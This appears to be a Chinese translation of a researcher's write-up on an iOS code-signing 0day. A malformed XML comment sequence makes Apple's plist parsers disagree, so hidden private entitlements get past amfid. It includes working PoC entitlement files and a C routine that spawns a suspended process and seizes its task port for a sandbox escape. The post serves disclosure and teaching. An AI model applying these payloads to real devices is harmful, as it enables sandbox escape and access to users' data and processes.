0. 概述
近日苹果发布了iOS 13.5 beta 3, 本次更新修复了我发现的一个Bug。它不仅仅是一个简单的Bug, 更是迄今我发现的第一个0day, 与此同时可能也是迄今最好的0day之一。或许这个0day不在于让你有所收获, 而是在于这个0day无比简单, 简单到我在Twitter发布的PoC看起来简直是个玩笑, 但这是100%真实的。
我将其命名为「通灵纸片」, 一如神秘博士随身携带的同名物件, 通过这个漏洞你可以使得他人相信你拥有本未拥有的凭据, 从而通过安全检查。
和我进行的其他Bug或exploit对比, 在不掌握任何关于iOS和exploit背景知识情况下也能够理解本次0day。本着这种精神, 我将尝试以不具备iOS和exploit知识的方式撰写本文。希望你能大致了解XML, 公钥加密和哈希。熟悉C代码将帮助你更好的理解本文。
1. 背景
1.1 技术背景
首先让我们一起来看一段XML文件示例:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE figment-of-my-imagination>
<container>
<meow>value</meow>
<whatever/>
</container>
<!-- herp -->
<idk a="b" c="d">xyz</idk>
基本概念标签(Tag), <tag>
打开标签, </tag>
关闭标签。在标签起始和结束标记之间插入内容, 内容可以是原始文本或更多标签。空标签可以是形如<tag/>
的自关闭标签, 可以具有key="val"
等属性。
上面的XML文件额外展示了除基本标签之外的三种语法:
-
<?...?>
, 以问号开头和结尾的标签称为处理指令, 会特殊处理。 -
<!DOCTYPE...>
, 以!DOCTYPE
开头的标签称为文档类型声明, 同样会特殊处理。 -
<!-- -->
, 以<!--
开头, 并以-->
结尾的标签为注释, 该标签和标签的内容会被忽略。
完整的XML规范包含了很多其他额外内容, 但这些内容与本文无关。
XML解析令人生畏, 你可以构造<mis>matched</tags>
这样的不匹配标签, 形如<attributes that="never closed">
甚至<tags are never closed>
的未关闭标签, 或者一个<!>
标签, 不胜枚举。因此正确解析XML格式绝非易事, 这一点对于我们本次讨论的Bug至关重要。
基于XML, 有一种名为"property list"
(简称plist
)的格式用于保存序列化数据。plist格式支持数组、字典、字符串、数字等等。plist文件存在多种形式, 在Apple软件生态常见的仅有两种, 分别是与本文无关的二进制格式bplist
和基于XML的格式。一个有效的XML/plist文件如下:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>OS Build Version</key>
<string>19D76</string>
<key>IOConsoleLocked</key>
<false/>
<!-- abc -->
<key>IOConsoleUsers</key>
<array>
<dict>
<key>kCGSSessionUserIDKey</key>
<integer>501</integer>
<key>kCGSessionLongUserNameKey</key>
<string>Siguza</string>
</dict>
</array>
<!-- def -->
<key>IORegistryPlanes</key>
<dict>
<key>IODeviceTree</key>
<string>IODeviceTree</string>
<key>IOService</key>
<string>IOService</string>
</dict>
</dict>
</plist>
Plist文件在iOS和macOS系统中俯拾皆是, 常用于配置文件、包属性声明, 以及对于本文最重要的代码签名。
一个二进制文件要在iOS上运行, 名为AppleMobileFileIntegrity
(简称AMFI
)的内核插件会要求该文件拥有有效的代码签名, 否则会被杀死进程。代码签名的具体机制我们无需关心, 对我们而言只需要知道它由一个哈希标识, 可以通过以下两种方式验证:
- 系统预置的签名, 称为
ad-hoc
签名。用于iOS系统应用和守护程序, 只需要在内核中对照已知哈希的集合检查即可。 - 使用代码签名证书的代码签名, 用于所有第3方应用程序。在这种情况下AMFI调用运行在用户空间的守护程序
amfid
进行校验。
代码签名证书有两种形式:
- App Store证书, 该证书仅由苹果自身所有。想要这种方式签名需要通过应用商店审核。
- 开发者证书, 可以是免费的7天有效期证书, 常规开发者证书, 或是企业发布证书。
对于后者, 请求签名的应用需要一个由Xcode获取的配置文件, 将该文件放置在应用安装包 embedded.mobileprovision 文件内。并由Apple并指定签名有效时间, 设备列表, 有效的开发者帐户, 以及应适用于该应用程序的所有限制。
现在简要介绍一下应用沙箱和安全边界。
在标准Unix环境中几乎唯有UID检查这一安全边界, 一个UID的进程无法访问另一UID的资源, 并且任何被视为”特权”的资源都需要UID 0, 即root用户。iOS和macOS沿用了这一机制, 同时也引入了entitlements
(权利)这一概念, 通俗的说, entitlements是应用于二进制文件的属性和特权列表。如果存在, 他们将以XML/plist的形式嵌入到二进制文件的代码签名中, 如下所示:
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>task_for_pid-allow</key>
<true/>
</dict>
</plist>
这意味着所述可执行文件拥有”task_for_pid-allow”的entitlements, 即允许调用task_for_pid()这一常规iOS应用无权使用的mach接口。对于entitlements的检查在iOS和macOS系统中贯穿始终, 诸如此类的entitlements数量逾千种(如果你好奇的话, Jonathan Levin创建了已知entitlements目录)。
重点在于, 所有第三方iOS应用都置于沙盒容器中。在沙盒中应用被限制访问尽可能少的文件、服务和内核API, 但与此同时配置entitlements可以突破这些限制。
于是一个有趣的问题摆在我们面前。iOS系统预置应用和守护进程由Apple进行签名, 它们不会索取应用不必要的特权。第三方应用程序经开发者申请后同样由Apple签署, 但申请签名提交的配置文件由开发人员自行创建, Apple仅负责签名。
这意味着配置文件只能创建被允许的entitlements列表, 否则将触发iOS系统安全限制。通过文本方式打开申请签名时提交的配置文件会观察到类似如下的内容:
<key>Entitlements</key>
<dict>
<key>keychain-access-groups</key>
<array>
<string>YOUR_TEAM_ID.*</string>
</array>
<key>get-task-allow</key>
<true/>
<key>application-identifier</key>
<string>YOUR_TEAM_ID.com.example.app</string>
<key>com.apple.developer.team-identifier</key>
<string>YOUR_TEAM_ID</string>
</dict>
与现有的1000多种授权相比, 此列表非常短, 仅有两个功能性授权keychain-access-groups
(与凭据相关)和get-task-allow
(允许调试应用)。
1.2 历史背景
早在2016年秋天, 我基于臭名昭著的Pegasus vulnerabilities
(飞马漏洞)撰写了自己的首个内核exploit。Pegasus vulnerabilities利用了XNU内核中OSUnserializeBinary
函数的内存错误, 该函数为另一个名为OSUnserializeXML
函数的调用, 这两个函数不是用来解析XML数据, 而是内核用于解析plist的方式。
鉴于我刚刚发现的内核exploit以及这两个代码混乱的函数, 在2017年1月我开始仔细研究它们以期挖掘更多内存Bug。
与此同时我正在探究如何在没有Xcode的情况下构建iOS应用。一方面是因为我想了解底层原理, 另一方面是因为我讨厌使用图形界面进行开发, 尤其是当Google搜索结果遍地的“单击此处”随着Xcode界面更新操作入口移至别处而不再有效。因此我每隔7天就会通过Xcode获取一个配置文件, 使用xcrun -sdk iphoneos clang
手动构建应用程序的二进制文件, 运用codesign
对其进行签名, 然后通过libimobiledevice
的ideviceinstaller
进行安装。
正是这一系列组合操作以及走大运使我发现Bug并兴奋地发了推文。
2. 漏洞详情
按照常理, 检查某个进程是否拥有某项权利的代码会以一个进程句柄和一个权利名称作为输入, 并返回一个表明该进程是否具有该权利的布尔值。庆幸的是, XNU在iokit/bsddev/IOKitBSDInit.cpp
中恰好实现了这样的函数:
extern "C" boolean_t
IOTaskHasEntitlement(task_t task, const char * entitlement)
{
OSObject * obj;
obj = IOUserClient::copyClientEntitlement(task, entitlement);
if (!obj) {
return false;
}
obj->release();
return obj != kOSBooleanFalse;
}
大部分工作由iokit/Kernel/IOUserClient
中的这两个函数完成:
OSDictionary* IOUserClient::copyClientEntitlements(task_t task)
{
#define MAX_ENTITLEMENTS_LEN (128 * 1024)
proc_t p = NULL;
pid_t pid = 0;
size_t len = 0;
void *entitlements_blob = NULL;
char *entitlements_data = NULL;
OSObject *entitlements_obj = NULL;
OSDictionary *entitlements = NULL;
OSString *errorString = NULL;
p = (proc_t)get_bsdtask_info(task);
if (p == NULL) {
goto fail;
}
pid = proc_pid(p);
if (cs_entitlements_dictionary_copy(p, (void **)&entitlements) == 0) {
if (entitlements) {
return entitlements;
}
}
if (cs_entitlements_blob_get(p, &entitlements_blob, &len) != 0) {
goto fail;
}
if (len <= offsetof(CS_GenericBlob, data)) {
goto fail;
}
/*
* Per <rdar://problem/11593877>, enforce a limit on the amount of XML
* we'll try to parse in the kernel.
*/
len -= offsetof(CS_GenericBlob, data);
if (len > MAX_ENTITLEMENTS_LEN) {
IOLog("failed to parse entitlements for %s[%u]: %lu bytes of entitlements exceeds maximum of %un",
proc_best_name(p), pid, len, MAX_ENTITLEMENTS_LEN);
goto fail;
}
/*
* OSUnserializeXML() expects a nul-terminated string, but that isn't
* what is stored in the entitlements blob. Copy the string and
* terminate it.
*/
entitlements_data = (char *)IOMalloc(len + 1);
if (entitlements_data == NULL) {
goto fail;
}
memcpy(entitlements_data, ((CS_GenericBlob *)entitlements_blob)->data, len);
entitlements_data[len] = '';
entitlements_obj = OSUnserializeXML(entitlements_data, len + 1, &errorString);
if (errorString != NULL) {
IOLog("failed to parse entitlements for %s[%u]: %sn",
proc_best_name(p), pid, errorString->getCStringNoCopy());
goto fail;
}
if (entitlements_obj == NULL) {
goto fail;
}
entitlements = OSDynamicCast(OSDictionary, entitlements_obj);
if (entitlements == NULL) {
goto fail;
}
entitlements_obj = NULL;
fail:
if (entitlements_data != NULL) {
IOFree(entitlements_data, len + 1);
}
if (entitlements_obj != NULL) {
entitlements_obj->release();
}
if (errorString != NULL) {
errorString->release();
}
return entitlements;
}
OSObject* IOUserClient::copyClientEntitlement(task_t task, const char * entitlement )
{
OSDictionary *entitlements;
OSObject *value;
entitlements = copyClientEntitlements(task);
if (entitlements == NULL) {
return NULL;
}
/* Fetch the entitlement value from the dictionary. */
value = entitlements->getObject(entitlement);
if (value != NULL) {
value->retain();
}
entitlements->release();
return value;
}
太棒了, 现在我们掌握了一个基于OSUnserializeXML的用于entitlements检查的参考实现。确实如此吗?
关于这个缺陷有一个很无厘头的事情, 我没办法指着特定的代码告诉你是这里导致的Bug。之所以如此, 是因为iOS实现了不止一个plist解析器, 甚至不止两个, 三个。iOS实现了至少4个plist解析器, 分别是:
-
OSUnserializeXML
位于 kernel -
IOCFUnserialize
位于 IOKitUser -
CFPropertyListCreateWithData
位于 CoreFoundation -
xpc_create_from_plist
位于 libxpc (闭源)
由此引起了三个有趣的问题:
- 哪个解析器用于解析entitlements?
- 哪个解析器被amfid采用?
- 所有解析器的解析结果都相同吗?
三者的答案分别是
- 全都用到了
- CFPropertyListCreateWithData
- 并不
由于正确解析XML异常困难, 因此对于有效的XML所有解析器返回相同的数据, 而稍微无效的XML它们会返回略有不同的数据。
换言之, 可以利用解析器的不同来使不同的解析器看到不同的内容。这是该Bug的核心, 使它不局限于逻辑缺陷, 更成为系统设计缺陷。
在继续exploit之前我想指出, 在所有测试中OSUnserializeXML和IOCFUnserialize始终返回相同的数据, 因此在本文的其余部分中我将它们视为等效。为简便起见, 我将 OSUnserializeXML/IOCFUnserialize简称为“IOKit”, CFPropertyListCreateWithData简称为“CF”和xpc_create_from_plist简称为“XPC”。
3. 漏洞利用
让我们从我发推的PoC变体开始, 这可能是利用此Bug的最优雅的方式:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<!-- these aren't the droids you're looking for -->
<!---><!-->
<key>platform-application</key>
<true/>
<key>com.apple.private.security.no-container</key>
<true/>
<key>task_for_pid-allow</key>
<true/>
<!-- -->
</dict>
</plist>
有趣的标签<!--->
和<!--
, 按照我对XML规范的理解它们不是有效的XML标签, 然而IOKit, CF和XPC都接受上述XML/plist, 尽管解析结果不尽相同。
我写了一个名为plparse的小工具, 通过输入文件和-c, -i, -x来分别使用CF, IOKit, XPC解析器来解析XML文件。使用上面的文件运行plparse我们得到如下结果:
% plparse -cix ent.plist
{
}
{
task_for_pid-allow: true,
platform-application: true,
com.apple.private.security.no-container: true,
}
{
com.apple.private.security.no-container: true,
platform-application: true,
task_for_pid-allow: true,
}
输出格式类似于JSON的简化版不影响了解它的要旨。从上到下依次是CF, IOKit 和 XPC的输出结果。这意味着当我们将上述entitlements文件传递到我们的应用程序(加上我们需要的App ID等), amfid使用CF来检查我们是否越权访问配置文件之外的entitlements时查看不到结果。但是当内核或某些守护进程想要检查是否允许我们执行Fun Stuff™时会看到我们拥有所有权限!那么这个示例如何生效? 这是CF的注释标签处理代码(存在多处):
case '!':
// Could be a comment
if (pInfo->curr+2 >= pInfo->end) {
pInfo->error = __CFPropertyListCreateError(kCFPropertyListReadCorruptError, CFSTR("Encountered unexpected EOF"));
return false;
}
if (*(pInfo->curr+1) == '-' && *(pInfo->curr+2) == '-') {
pInfo->curr += 2;
skipXMLComment(pInfo);
} else {
pInfo->error = __CFPropertyListCreateError(kCFPropertyListReadCorruptError, CFSTR("Encountered unexpected EOF"));
return false;
}
break;
// ...
static void skipXMLComment(_CFXMLPlistParseInfo *pInfo) {
const char *p = pInfo->curr;
const char *end = pInfo->end - 3; // Need at least 3 characters to compare against
while (p < end) {
if (*p == '-' && *(p+1) == '-' && *(p+2) == '>') {
pInfo->curr = p+3;
return;
}
p ++;
}
pInfo->error = __CFPropertyListCreateError(kCFPropertyListReadCorruptError, CFSTR("Unterminated comment started on line %d"), lineNumber(pInfo));
}
这是IOKit的注释标签处理代码:
if (c == '!') {
c = nextChar();
bool isComment = (c == '-') && ((c = nextChar()) != 0) && (c == '-');
if (!isComment && !isAlpha(c)) {
return TAG_BAD; // <!1, <!-A, <!eos
}
while (c && (c = nextChar()) != 0) {
if (c == 'n') {
state->lineNumber++;
}
if (isComment) {
if (c != '-') {
continue;
}
c = nextChar();
if (c != '-') {
continue;
}
c = nextChar();
}
if (c == '>') {
(void)nextChar();
return TAG_IGNORE;
}
if (isComment) {
break;
}
}
return TAG_BAD;
}
可以看出, IOKit将检查!--
字符, 正确地将指针前进三个字符, 然后再看到->
, 这不会结束注释。反之, CF仅将指针前移两个字符, 因此它将第二个字符解析两次, 从而同时看到<!--
和-->
。这意味着IOKit将<!--->
视为注释的开始, 而CF则将其视为开始和结束。之后, 我们为两个解析器提供<!-->
标签, 该标签过于简短以至于无法被两个解析器解析为完整注释。但是在注释中与未在注释中会引起有趣的行为, 如果我们当前在注释中, 则两个解析器都会看到-->
结束注释, 否则它们都只会看到<!--
开始标签。总而言之, 这意味着:
<!--->
CF sees these bits
<!-->
IOKit sees these bits
<!-- -->
至此我们无需继续关注XPC, 后续测试中XPC与IOKit解析结果完全相同, 对我们而言算是好消息一桩。可以使用CF偷偷获得超过amfid的权利, 与此同时IOKit和XPC解析时显示它们!我测试了另外两个变体, 结果不尽相同:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict hurr=">
</dict>
</plist>
">
<key>task_for_pid-allow</key>
<true/>
</dict>
</plist>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<???><!-- ?>
<key>task_for_pid-allow</key>
<true/>
<!-- -->
</dict>
</plist>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE [%>
<plist version="1.0">
<dict>
<key>task_for_pid-allow</key>
<true/>
</dict>
</plist>
;]>
<plist version="1.0">
<dict>
</dict>
</plist>
与第一种变体相比它们都没有那么优雅, 也没有什么收获, 我将其作为练习让读者了解解析器差异是由哪些原因引起的, 或者不同的解析器如何应对这些文件。
不过要注意的一件事是, 根据在苹果设备上安装IPA文件所使用的方式不同, 获取这些entitlements来存活进程可能遇到问题。
这是因为预置应用程序上的entitlements还包含team ID和app ID, 每次签名时Cydia Impactor都会随机生成该标识符, 因此必须解析, 修改和重新生成entitlements文件。这个问题目前我尚未找到解决方式, 但我获悉Xcode可以正常处理entitlements文件, 同理codesign + ideviceinstaller的手动替代方案也可以正常处理。
4. 沙盒逃逸
现在我们只需要挑选所需的entitlements即可, 作为初步PoC我选择以下三项entitlements:
- com.apple.private.security.no-container – 可以阻止沙箱将任何配置文件应用于我们的进程, 这意味着我们现在可以读取和写入
mobile
用户可以访问的任何位置, 执行大量的系统调用, 并与我们之前不允许使用的数百种驱动程序和用户态服务进行对话。就用户数据而言, 安全性不再存在。 - task_for_pid-allow – 万一文件系统不够用, 这使我们可以查找任何以
mobile
运行的进程的任务端口, 然后将其用于读写进程内存或直接获取/设置线程寄存器状态。 - platform-application – 通常, 我们将被标记为非Apple二进制文件, 并且不允许在Apple二进制文件的任务端口上执行上述操作, 但是此entitlements将我们标记为货真价实的系统应用。:P
如果上述entitlements还不够, 假设我们需要CF也拥有某些entitlements, 那么我们可以通过上述三个entitlements轻易的实现。我们要做的就是找到一个包含所需entitlements的二进制文件, posix_spawn
处于刮起状态, 获取创建新进程的任务端口然后将其招安。
task_t haxx(const char *path_of_executable)
{
task_t task;
pid_t pid;
posix_spawnattr_t att;
posix_spawnattr_init(&att);
posix_spawnattr_setflags(&att, POSIX_SPAWN_START_SUSPENDED);
posix_spawn(&pid, path_of_executable, NULL, &att, (const char*[]){ path_of_executable, NULL }, (const char*[]){ NULL });
posix_spawnattr_destroy(&att);
task_for_pid(mach_task_self(), pid, &task);
return task;
}
您可以进一步获得一些JIT entitlements来动态加载或生成代码, 可以生成shell或浩如烟海的其他内容。
这个缺陷仅有root和kernel两项entitlements没有提供给我们, 但是对于这两种情况, 我们有不胜其数的其他方式。而且我认为与其折腾用户态的root, 不如直接攻破内核态。
亲爱的读者, 我希望您能对我而言丢掉一个0day是偌大的损失有所感受。那么, 不妨升级到“拥有所有entitlements的手机”作为练习吧。:)
5. 补丁文件
考虑到此缺陷难以捉摸的性质, Apple最终如何对其进行修补?显然, 只有一种方法:引入更多的plist解析器!唯一的方法!
在iOS13.4中, 归功于Linus Henze的错误报告, Apple在某种程度上加强了entitlements检查:
AppleMobileFileIntegrity
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation
Impact: An application may be able to use arbitrary entitlements
Description: This issue was addressed with improved checks.
CVE-2020-3883: Linus Henze (pinauten.de)
虽然我不知道该错误的确切细节, 但根据Linus的一条推文, 我认为这与bplist有关, 尽管利用了解析器差异, 但不会过去。我的错误实际上在13.4修复中仍然存在, 但最终在13.5 beta 3中被杀死。
我也不知道是Linus, Apple还是其他人寻求更多解析器差异, 但是在两个连续的次要iOS版本中修复了两个授权错误, 这感觉太巧合了, 所以我强烈假设从Linus的错误中汲取灵感的人。
苹果公司的最终解决方案包括引入一个称为AMFIUnserializeXML
的新函数, 该函数既粘贴到AMFI.kext
中, 又粘贴到amfid
中, 用于与OSUnserializeXML
和CFPropertyListCreateWithData
的结果进行比较以确保它们相同。您仍然可以在权利中包含一个类似<!--->
<!->
<!-->
的序列, 该序列将会通过, 但是尝试在这些注释之间偷偷摸摸, AMFI将破坏您的流程切碎并报告给syslog: AMFI:在权利解析期间检测到异常。
因此, 尽管从技术上确实使XML/plist解析器的数量从4增加到了6, 但确实缓解了我发现的漏洞。:(
6. 结论
随着我的第一个0day被修复, 我无比期望能发现一个更棒的0day。这个Bug已帮助我完成了数十个研究项目, 每年被使用数千次, 为我节省了很多时间。关于这个Bug的exploit很可能是我一生中写的最可靠, 最整洁, 最优雅的代码。甚至可以用一条推文演示!
我们也应该问自己, 这样的错误怎么可能存在。为什么在iOS上有4个不同的plist解析器? 甚至为什么我们还在使用XML? 我认为它们比技术细节更值得思考。
回顾全文, 尽管定期自问我们的思维模式是否有错或者更详尽的记录与探讨是好办法。但我们也不应对Apple过分苛责, 或许这类Bug最难发现, 而且我真的不知道我怎么能找到它, 而很多其他人却找不到。
由于行文仓促难免有所疏漏, 敬请不吝赐教交流。通过我的Twitter或@.net电子邮箱和我取得联系, 其中* = siguza。
在撰写本文时, 该Bug仍存在于最新的正式版iOS中。我在GitHub托管了完整的项目源码, 趁着漏洞尚未完全封堵尽情把玩吧!